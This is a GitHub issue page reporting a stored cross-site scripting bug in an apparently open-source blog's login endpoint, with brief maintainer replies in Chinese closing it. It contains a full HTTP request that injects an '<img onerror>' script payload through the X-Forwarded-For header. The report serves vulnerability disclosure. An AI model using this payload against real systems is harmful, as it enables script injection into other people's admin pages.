Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

These is A stored xss vulnerability #126

Closed
4 of 6 tasks
Artemis1029 opened this issue Apr 4, 2019 · 2 comments
Closed
4 of 6 tasks

These is A stored xss vulnerability #126

Artemis1029 opened this issue Apr 4, 2019 · 2 comments
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability

Comments

@Artemis1029
Copy link

Artemis1029 commented Apr 4, 2019

我确定我已经查看了 (标注[ ][x])


我要申请 (标注[ ][x])

  • BUG 反馈
  • 添加新的特性或者功能
  • 请求技术支持

Bug Report

In issue 9, someone reported two storage XSS, and you have fixed, but the Second XSS. But it still has another output point X-Forwarded-For
payload HTTP Requests

POST /admin/getLogin HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 56
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.<img src=1 onerror=alert(123)>0.0.2

loginName=asas&loginPwd=asas

图片

图片

@ruibaby
Copy link
Member

ruibaby commented Apr 4, 2019

@Artemis1029 好的,我们会尽快处理该问题,非常感谢你的反馈.

@ruibaby ruibaby added the kind/bug Categorizes issue or PR as related to a bug. label Apr 4, 2019
@JohnNiang JohnNiang added the vulnerability Vulnerability label Apr 4, 2019
@ruibaby
Copy link
Member

ruibaby commented May 28, 2019

准备发布 v1,所以关闭该 issue。

@ruibaby ruibaby closed this as completed May 28, 2019
JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability
Projects
None yet
Development

No branches or pull requests

3 participants